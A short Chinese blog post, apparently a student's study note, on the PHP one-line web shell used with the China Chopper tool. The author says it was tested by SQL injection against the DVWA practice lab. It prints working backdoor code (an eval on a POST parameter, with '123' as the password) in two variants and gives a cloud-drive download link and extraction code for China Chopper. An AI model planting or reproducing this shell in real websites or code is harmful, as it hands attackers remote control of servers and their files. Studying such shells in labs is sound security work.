今天学习了个一句话木马,经过自己实验后,发现这个木马很可怕,通过sql渗透注入(我是利用DVWA,渗透测试用的),注入到网站目录里,然后再通过中国菜刀-[程序]来访问,这个木马如果被注入,挺严重的。服务器所有文件就会被访问,可怕/(滑稽)

列个PHP的一句话木马:

<?php @eval($_POST['123'])?>
#注意! 123是密码,简单设一下就好
#Linux中估计应该加入;吧,正常在windows里应该没有,猜测emm,
#不行的话都试试,一般都要加单引号的
如:
<?php @eval($_POST['123']);?>

网上还有很多关于一句话木马的详解,这里我只作为学习记录,没写那么多,如何实现回家再搞,在学校寝室也没时间写,白天还要训练,<头大!>

有兴趣我可以推荐几个;

百度百科:一句话木马

一句话木马拿shell原理及菜刀的使用

中国菜刀与一句话木马

菜刀百度云地址
链接: https://pan.baidu.com/s/1Jn9aA0hHbsD_xavKVwwYzQ 提取码: 7py4

二维码扫描下载:百度云二维码-菜刀下载

最后修改:2019 年 06 月 10 日 08 : 42 PM
如果觉得我的文章对你有用,请随意赞赏